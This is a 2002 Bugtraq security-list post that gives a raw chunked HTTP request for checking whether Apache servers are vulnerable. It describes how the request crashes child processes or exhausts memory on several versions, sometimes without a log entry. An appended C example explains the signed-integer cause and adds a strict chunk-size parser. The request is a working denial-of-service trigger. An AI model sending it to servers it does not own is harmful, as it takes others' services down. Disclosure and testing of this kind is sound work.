Bugtraq mailing list archives
Re: ISS Advisory: Remote Compromise Vulnerability in Apache HTTP Server
From: Joe Testa <jtesta () rapid7 com>
Date: Wed, 19 Jun 2002 08:26:31 -0400
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Greetings sweaty Apache admins,

Now that the Apache group has released official fixes, here is a
test string that can be used to check if your server is vulnerable:

    POST /x.html HTTP/1.1
    Host: 192.168.x.x
    Transfer-Encoding: chunked

    80000000
    Rapid 7
    0

Here is the behavior that the above string will produce:

UNIX:
    Apache 1.3.24:
        Connection is instantly dropped.
        The connection is not logged in the access_log, but the following
        will appear in the error_log:

            [Mon Jun 17 16:12:25 2002] [notice] child pid 21452 exit signal
            Segmentation fault (11)

    Apache 2.0.36:
        No effect! Hmmm...

Win32:
    Apache 1.3.24:
        Connection is instantly dropped.
        The connection is *not* logged in access_log nor error_log!

    Apache 2.0.36:
        Connection appears to hang while child thread consumes all
        available memory. After a minute or two, the OS reports that
        virtual memory is exhausted via a server-side dialog box.
        A remote client cannot determine the result of this test
        because the connection remains open until the dialog box is
        dismissed. A non-vulnerable server will not drop the
        connection because it is waiting to receive 2 gigabytes of
        legitimately chunked data.
        The connection is not logged in access_log, but the following will
        appear in the error_log:

            [Tue Jun 18 09:16:34 2002] [notice] Parent: child process exited
            with status 3221225477 -- Restarting.

- ---

Note that in the test string above, you can interchange the "POST"
with "GET", and you can use any hex value between 80000000 and
FFFFFFFF for the chunk size.

Comments are much appreciated.

- Joe Testa

GPG key: http://www.cs.rit.edu/~jst3290/joetesta_r7.pub
A22B 2683 C40E 5443 AE52 AD6D 65B2 F5DF 4B11 06B4

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)
iD8DBQE9EHgzZbL130sRBrQRArCAAJ9GcN9tJPTdo1KFbmGc59sCASAhOwCfX5nn
hWWOxf/ygikJrpuamlJ6/Js=
=sTVg
-----END PGP SIGNATURE-----
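
Added example, not part of the original post and not Apache's code: the chunk sizes the post names (80000000 through FFFFFFFF) are exactly the 32-bit values with the top bit set, which read as negative when held in a signed 32-bit integer. The C code below shows that, next to a strict chunk-size parser that rejects such sizes; MAX_CHUNK_SIZE, as_signed32 and parse_chunk_size are hypothetical names and the 16 MiB limit is an assumed policy.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Hypothetical policy limit for this example (16 MiB per chunk). */
#define MAX_CHUNK_SIZE (16u * 1024u * 1024u)

/* Value a parser would see if it kept the size in a signed 32-bit int. */
int32_t as_signed32(uint32_t v)
{
    return v >= 0x80000000u ? (int32_t)((int64_t)v - 4294967296LL) : (int32_t)v;
}

/* Strict parse of the hex chunk-size field, ending at ';', CR, LF or NUL.
 * Returns 0 and stores the size in *out, or -1 if the field is rejected. */
int parse_chunk_size(const char *line, uint32_t *out)
{
    uint64_t size = 0;
    size_t digits = 0;

    for (; *line && *line != ';' && *line != '\r' && *line != '\n'; line++) {
        unsigned d;
        if (*line >= '0' && *line <= '9')      d = (unsigned)(*line - '0');
        else if (*line >= 'a' && *line <= 'f') d = (unsigned)(*line - 'a' + 10);
        else if (*line >= 'A' && *line <= 'F') d = (unsigned)(*line - 'A' + 10);
        else return -1;                 /* not a hex digit */
        size = (size << 4) | d;
        digits++;
        if (size > MAX_CHUNK_SIZE)      /* checked per digit, so size never wraps */
            return -1;
    }
    if (digits == 0)
        return -1;                      /* empty size field */
    *out = (uint32_t)size;
    return 0;
}

int main(void)
{
    /* Constructed inputs: one ordinary size and the two ends of the post's range. */
    const char *samples[] = { "1a", "80000000", "FFFFFFFF" };
    for (size_t i = 0; i < 3; i++) {
        uint32_t n = 0;
        int rc = parse_chunk_size(samples[i], &n);
        printf("%-8s -> %s\n", samples[i], rc == 0 ? "accepted" : "rejected");
    }
    printf("0x80000000 as int32: %ld\n", (long)as_signed32(0x80000000u));
    return 0;
}
```
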
